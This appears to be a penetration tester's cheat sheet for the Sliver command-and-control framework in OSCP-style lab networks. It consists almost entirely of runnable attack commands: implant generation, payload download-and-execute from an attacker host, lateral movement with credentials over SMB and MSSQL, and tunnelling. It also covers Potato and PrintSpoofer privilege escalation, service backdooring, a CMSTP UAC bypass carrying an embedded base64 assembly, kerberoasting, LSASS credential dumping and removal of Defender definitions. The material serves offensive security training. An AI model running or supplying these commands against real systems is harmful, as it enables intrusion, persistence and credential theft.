+45 45 34 44 00
Need a penetration test?
Contact us for a no-obligation conversation about your security needs.
Contact ussliver
https://seamlessintelligence.com.au/sliver_2.html
guide https://seamlessintelligence.com.au/sliver_2.html
======= https://github.com/Anon-Exploiter/sliver-cheatsheet?tab=readme-ov-file
Sometimes sliver is buggy on kali, use https://github.com/BishopFox/sliver/releases instead.
setup server
$ sliver-server
...
[server] sliver > generate --mtls 192.168.45.249,10.10.207.147 -j 3 -e -l -Z s -N agent
[server] sliver > generate --mtls 192.168.45.249,10.10.207.147 -j 3 -e -l -Z s -o linux -N agent.elf
[server] sliver > mtls
[server] sliver > armory install all
[server] sliver > sessions
download and run sliver client
└─$ python3 -m http.server 80 -d .
powershell
powershell.exe -Command "Invoke-WebRequest -OutFile c:\temp\windows\agent.exe http://192.168.45.249/agent.exe ; .\agent.exe"
"iwr -uri http://192.168.45.212/agent.exe -Outfile agent.exe ; c:\temp\windows\agent.exe"
cmd
certutil -urlcache -split -f "http://192.168.45.249/agent.exe" agent.exe
curl.exe -o c:\windows\temp\agent1.exe http://192.168.49.100:81/agent1.exe
bitsadmin /transfer myDownloadJob /download /priority normal http://192.168.45.249/agent.exe c:\users\temp\
agent.exe
Unpack zip from powershell
Expand-Archive -Force C:\path\to\archive.zip C:\where\to\extract\to
upload and run sliver client over smb
└─$ nxc smb client02 -u o.foller -p EarlyMorningFootball777 -x 'powershell.exe -Command "Invoke-WebRequest -OutFile c:\windows\temp\agent.exe http://192.168.45.212/agent5.exe"'
SMB 192.168.174.160 445 CLIENT02 [+] Executed command via wmiexec
└─$ nxc smb client02 -u o.foller -p EarlyMorningFootball777 -x 'c:\windows\temp\agent.exe'
SMB 192.168.174.160 445 CLIENT02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.174.160 445 CLIENT02 [+] zeus.corp\o.foller:EarlyMorningFootball777 (Pwn3d!)
SMB 192.168.174.160 445 CLIENT02 [-] wmiexec: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method
SMB 192.168.174.160 445 CLIENT02 [+] Executed command via wmiexec
if error Execute command failed, ... has no 'Invoke' rights to execute command (shell type: cmd) try
└─$ nxc winrm gyoza -u Eric.Wallows -p EricLikesRunning800 -X "cmd /c agent212.exe"
upload and run sliver client via MSSQL
$ nxc mssql MS02 -u sql_svc -p Dolphin1 --put-file agent.exe C:\\Windows\\Temp\\agent.exe
$ nxc mssql MS02 -u sql_svc -p Dolphin1 -X "& C:\\Windows\\Temp\\agent.exe"
wait for 20 seconds
create tunnel with ligoglo-ng
$ sudo ligolo-proxy -selfcert
ligolo-ng » certificate_fingerprint
[server] sliver (agent) > upload /usr/share/ligolo-ng-common-binaries/ligolo-ng_agent_0.8.2_windows_amd64.exe
[server] sliver (agent) > execute -t 5 cmd /c "start /b ligolo-ng_agent_0.8.2_windows_amd64.exe -connect 192.168.45.204:11601 -accept-fingerprint B9A0DFF9A9BDB140610A962FBC48616364677E962F2755272B1F54E5DBA4E486"
ligolo-ng » session
[Agent : NT AUTHORITY\SYSTEM@MS01] » autoroute
create forward with ligoglo-ng for sliver - more stable than sliver rportfwd
[Agent : NT AUTHORITY\SYSTEM@MS01] » listener_add --addr 10.10.207.147:8888 --to 192.168.45.204:8888 --tcp
masscan and nmap over ligoglo-ng interface enabledmagus
└─$ sudo ~/bin/masscan -e enabledmagus -p-,U:- –banners –rate=1000 $(grep 10.10 /etc/hosts|cut -d’ ’ -f1) –adapter-ip 10.10.207.147 | tee masscan.10.10 └─$ cat masscan.10.10 | ~/bin/masscan2nmap.py | sudo parallel
show my user/group/privilege
[server] sliver (agent) > execute -o whoami /all
winPEAS / linpeas
[server] sliver (agent) > upload /usr/share/peass/winpeas/winPEASany.exe
[server] sliver (agent) > execute -t 600 -o -E err -O username.winpeasy winPEASany.exe
[server] sliver (agent) > download username.winpeasy
[server] sliver (agent.elf) > upload /usr/share/peass/linpeas/linpeas.sh
[server] sliver (agent.elf) > execute -t 5 -o chmod +x linpeas.sh
[server] sliver (agent.elf) > execute -t 600 -o -E err -O www.linpeas linpeas.sh
Linux exploit suggester, with some exploits
[server] sliver (agent.elf) > upload /home/pentests/lpe-linux.tgz
[server] sliver (agent.elf) > execute -t 5 -o tar xvzf lpe-linux.tgz
[server] sliver (agent.elf) > execute -t 10 -o lpe-linux/linux-exploit-suggester.sh
save a local file
[server] sliver (agent) > execute -t 300 -s cmd /c "dir /s /b"
$ grep -vE '(.png|.jpg|SysWOW64|.manifest|RollupFix|WinSxS|PCHealthCheck|WindowsUpdate.|WindowsApps)' /tmp/execute_MS01_202507090809534184240560.log
$ grep -E '(proof.txt|local.txt|PSReadLine/ConsoleHost_history*|id_rsa*|.kdbx|.ini|.txt|.pdf|.xls|.xlsx|.doc|.docx|.db).$' /tmp/execute_MS01_202507090809534184240560.log | less
audit to find weakness
[server] sliver (agent1) > sharpup -t 200 -- audit
[server] sliver (agent1) > seatbelt -t 200 -- -group=all
audit for Privilege Escalation Enumeration Script for Windows
└─$ wget 'https://raw.githubusercontent.com/itm4n/PrivescCheck/refs/heads/master/release/PrivescCheck.ps1'
[server] sliver (agent212) > upload PrivescCheck.ps1
[server] sliver (agent212) > execute -o -t 300 powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Extended checks + human-readable reports
[server] sliver (agent212) > execute -o -t 600 powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"
find powershell history file
[server] sliver (agent1) > cat AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
show process
[server] sliver (agent4) > ps -O -c
bof-roast
[server] sliver (agent) > execute -o -- setspn.exe -Q */*
[server] sliver (agent) > bof-roast MSSQL/MS02.oscp.exam
[*] Successfully executed bof-roast (coff-loader)
[*] Got output:
[+] Target SPN: MSSQL/MS02.oscp.exam
[+] Got Ticket! Convert it with apreq2hashcat.pyYIIGbwYJ...
$ tee apreq.ticket <<EOF
YIIGbwYJ...
EOF
$ wget https://raw.githubusercontent.com/cube0x0/BofRoast/refs/heads/main/BofRoast/apreq2hashcat.py
$ python3 apreq2hashcat.py apreq.ticket > hash.ticket
# look for $krb5tgs$23$; - RC4 --- if $krb5tgs$18$* AES is too hard
$ hashcat hash.ticket /usr/share/wordlists/rockyou.txt.gz -m 13100 -a 0 -r /usr/share/hashcat/rules/best64.rule
rubeus - kerberoasting
[server] sliver (agent2) > rubeus kerberoast /simple
Elevate privilege / General
see https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/ SeBackupPrivilege: We can dump password hashes from registry hives. We can read restricted files. SeDebugPrivilege: We can impersonate token for the lsass.exe, winlogon.exe and other processes. SeImpersonatePrivilege: We can use LocalPotato techniques. SeTakeOwnershipPrivilege: We can read restricted files by taking ownership.
Elevate privilege / abusing SeImpersonatePrivilege
injecting PrintSpoofer64.exe into a running process and launching sliver-agent Download PrintSpoofer64.exe from https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
$ donut -iPrintSpoofer64.exe -p "-i -c c:\windows\temp\agent.exe" -a 2 -o print.bin
[server] sliver (agent1) > upload print.bin
[server] sliver (agent1) > execute-shellcode -p 4596 print.bin
[*] Session 8ff76082 agent1 - 192.168.179.141:58432 (MS01) - windows/amd64 - Sun, 06 Jul 2025 13:16:45 CEST
another way
[server] sliver (agent213) > upload PrintSpoofer64.exe
[server] sliver (agent213) > execute -o -t 20 PrintSpoofer64.exe -c agent.exe
└─$ wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip └─$ 7z x JuicyPotatoNG.zip [server] sliver (agent212) > upload agent212.exe [server] sliver (agent212) > upload JuicyPotatoNG.exe [server] sliver (agent212) > execute -o -t 4 JuicyPotatoNG.exe -t * -p agent212.exe
Another method, but not stable nor fast
└─$ wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
[server] sliver (agent212) > upload GodPotato-NET4.exe
[server] sliver (agent212) > execute -o -t 50 GodPotato-NET4.exe -cmd "cmd /c whoami /all"
[server] sliver (agent212) > execute -o -t 50 GodPotato-NET4.exe -cmd "cmd /c agent212.exe"
Not tested
└─$ wget https://github.com/antonioCoco/RoguePotato/releases/download/1.0/RoguePotato.zip
└─$ 7z x RoguePotato.zip
RoguePotato.exe
???
Server not patched before January 2023, exploit CVE-2023-21746
└─$ wget https://github.com/decoder-it/LocalPotato/releases/download/v1.1/LocalPotato.zip
└─$ 7z x LocalPotato.zip
[server] sliver (agent212) > upload LocalPotato.exe
????
Elevate SeBackupPrivilege
https://github.com/giuliano108/SeBackupPrivilege https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/
└─$ wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll?raw=true -O SeBackupPrivilegeUtils.dll
└─$ wget https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll?raw=true -O SeBackupPrivilegeCmdLets.dll
[server] sliver (agent5) > upload SeBackupPrivilegeUtils.dll
[server] sliver (agent5) > upload SeBackupPrivilegeCmdLets.dll
[server] sliver (agent5) > shell
PS C:\Users\d.chambers\appdata> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\d.chambers\appdata> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\d.chambers\appdata> Get-SeBackupPrivilege
PS C:\Users\d.chambers\appdata> copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\proof.txt C:\Users\d.chambers\appdata\proof.txt -overwrite
Elevate with another users passwoord
[server] sliver (agent) > runas -p agent.exe -u "zachary" -P "Th3R@tC@tch3r"
Inject a local service we have access to, according to sharpup audit
[server] sliver (agent1) > sharpup -t 200 -- audit
...
=== Modifiable Service Binaries ===
Service 'GPGOrchestrator' (State: Running, StartMode: Auto) : "C:\Program Files\MilleGPG5\GPGService.exe"
=== Modifiable Services ===
Service 'GPGOrchestrator' (State: Running, StartMode: Auto)
...
[server] sliver (agent1) > execute -o sc query GPGOrchestrator
[server] sliver (agent1) > execute -o sc stop GPGOrchestrator
[server] sliver (agent1) > profiles new --mtls 192.168.45.165 -f shellcode service
[server] sliver (agent1) > backdoor --profile service "C:\Program Files\MilleGPG5\GPGService.exe"
[server] sliver (agent1) > execute -t 4 -o sc start GPGOrchestrator
Elevate from administrator with UAC to without UAC
inspiration from https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html
$ tee CMSTP-UAC-Bypass.ps1 <<EOF
function Bypass-UAC
{
Param(
[Parameter(Mandatory = \$true, Position = 0)]
[string]\$Command
)
if(-not ([System.Management.Automation.PSTypeName]'CMSTPBypass').Type)
{
[Reflection.Assembly]::Load([Convert]::FromBase64String("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QnlwYXNzLmRsbABDTVNUUEJ5cGFzcwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AEluZkRhdGEAU2hvd1dpbmRvdwBTZXRGb3JlZ3JvdW5kV2luZG93AEJpbmFyeVBhdGgAU2V0SW5mRmlsZQBFeGVjdXRlAFNldFdpbmRvd0FjdGl2ZQAuY3RvcgBoV25kAG5DbWRTaG93AENvbW1hbmRUb0V4ZWN1dGUAUHJvY2Vzc05hbWUAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAENNU1RQLVVBQy1CeXBhc3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAERsbEltcG9ydEF0dHJpYnV0ZQB1c2VyMzIuZGxsAFN5c3RlbS5JTwBQYXRoAEdldFJhbmRvbUZpbGVOYW1lAENoYXIAQ29udmVydABUb0NoYXIAU3RyaW5nAFNwbGl0AFN5c3RlbS5UZXh0AFN0cmluZ0J1aWxkZXIAQXBwZW5kAFJlcGxhY2UAVG9TdHJpbmcARmlsZQBXcml0ZUFsbFRleHQARXhpc3RzAENvbnNvbGUAV3JpdGVMaW5lAENvbmNhdABTeXN0ZW0uRGlhZ25vc3RpY3MAUHJvY2Vzc1N0YXJ0SW5mbwBzZXRfQXJndW1lbnRzAHNldF9Vc2VTaGVsbEV4ZWN1dGUAUHJvY2VzcwBTdGFydABJbnRQdHIAWmVybwBvcF9FcXVhbGl0eQBTeXN0ZW0uV2luZG93cy5Gb3JtcwBTZW5kS2V5cwBTZW5kV2FpdABHZXRQcm9jZXNzZXNCeU5hbWUAUmVmcmVzaABnZXRfTWFpbldpbmRvd0hhbmRsZQAuY2N0b3IAAAMuAAAfQwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAAANcAAAJLgBpAG4AZgAAKVIARQBQAEwAQQBDAEUAXwBDAE8ATQBNAEEATgBEAF8ATABJAE4ARQAAQUMAbwB1AGwAZAAgAG4AbwB0ACAAZgBpAG4AZAAgAGMAbQBzAHQAcAAuAGUAeABlACAAYgBpAG4AYQByAHkAIQAAMVAAYQB5AGwAbwBhAGQAIABmAGkAbABlACAAdwByAGkAdAB0AGUAbgAgAHQAbwAgAAAJLwBhAHUAIAAAC2MAbQBzAHQAcAAAD3sARQBOAFQARQBSAH0AAISPWwB2AGUAcgBzAGkAbwBuAF0ADQAKAFMAaQBnAG4AYQB0AHUAcgBlAD0AJABjAGgAaQBjAGEAZwBvACQADQAKAEEAZAB2AGEAbgBjAGUAZABJAE4ARgA9ADIALgA1AA0ACgANAAoAWwBEAGUAZgBhAHUAbAB0AEkAbgBzAHQAYQBsAGwAXQANAAoAQwB1AHMAdABvAG0ARABlAHMAdABpAG4AYQB0AGkAbwBuAD0AQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMADQAKAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAPQBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4ADQAKAA0ACgBbAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgBdAA0ACgA7ACAAQwBvAG0AbQBhAG4AZABzACAASABlAHIAZQAgAHcAaQBsAGwAIABiAGUAIAByAHUAbgAgAEIAZQBmAG8AcgBlACAAUwBlAHQAdQBwACAAQgBlAGcAaQBuAHMAIAB0AG8AIABpAG4AcwB0AGEAbABsAA0ACgBSAEUAUABMAEEAQwBFAF8AQwBPAE0ATQBBAE4ARABfAEwASQBOAEUADQAKAHQAYQBzAGsAawBpAGwAbAAgAC8ASQBNACAAYwBtAHMAdABwAC4AZQB4AGUAIAAvAEYADQAKAA0ACgBbAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAF0ADQAKADQAOQAwADAAMAAsADQAOQAwADAAMQA9AEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4ALAAgADcADQAKAA0ACgBbAEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4AXQANAAoAIgBIAEsATABNACIALAAgACIAUwBPAEYAVABXAEEAUgBF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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAA0D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")) | Out-Null
}
[CMSTPBypass]::Execute(\$Command)
}
EOF
[server] sliver (agent) > upload CMSTP-UAC-Bypass.ps1
[server] sliver (agent) > upload agent.exe
[server] sliver (agent) > shell
PS C:\users\zachary> . .\CMSTP-UAC-Bypass.ps1
PS C:\users\zachary> Bypass-UAC -Command "C:\users\zachary\agent.exe"
[server] sliver (agent) > use
[server] sliver (agent) > getsystem
Certificate Abuse
[server] sliver (agent) > certify find /vulnerable
certify request /ca:sv001-dc.corp1.local\\corp1-SV001-DC-CA /template:WebServerVuln /altname:jboss
$ openssl pkcs12 -in cert.cer -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
[server] sliver (agent) > upload /mnt/seamless/sliver/cert.pfx
[server] sliver (agent) > rubeus asktgt /user:jboss /certificate:C:\\Windows\\system32\\cert.pfx
dump lsa
[server] sliver (SOLID_BLADE) > mimikatz privilege::debug sekurlsa::logonpasswords
dump lsa, alternative.
[server] sliver (agent) > ps -e lsa
[server] sliver (agent) > procdump -p 676
$ pypykatz lsa minidump --json /tmp/procdump_MS01_676_844155305
Run programs
[server] sliver (agent1) > execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
When eveluated to AD user, ennummerate AD
[server] sliver (agent1) > whoami
Logon ID: OSCP\celia.almeda
[*] Current Token ID: OSCP\celia.almeda
[server] sliver (agent1) > sharp-hound-4 -- '-c all,GPOLocalGroup'
[*] sharp-hound-4 output:
2025-07-06T06:01:45.7689958-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-07-06T06:01:45.8692195-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-07-06T06:01:45.8753762-07:00|INFORMATION|Initializing SharpHound at 6:01 AM on 7/6/2025
2025-07-06T06:01:45.9684446-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for oscp.exam : DC01.oscp.exam
2025-07-06T06:01:46.1258558-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-07-06T06:01:46.2613032-07:00|INFORMATION|Beginning LDAP search for oscp.exam
2025-07-06T06:01:46.2613032-07:00|INFORMATION|Testing ldap connection to oscp.exam
2025-07-06T06:01:46.2795686-07:00|INFORMATION|Beginning LDAP search for oscp.exam Configuration NC
2025-07-06T06:02:16.9212082-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 41 MB RAM
2025-07-06T06:02:28.4338157-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-07-06T06:02:28.4338157-07:00|INFORMATION|LDAP channel closed, waiting for consumers
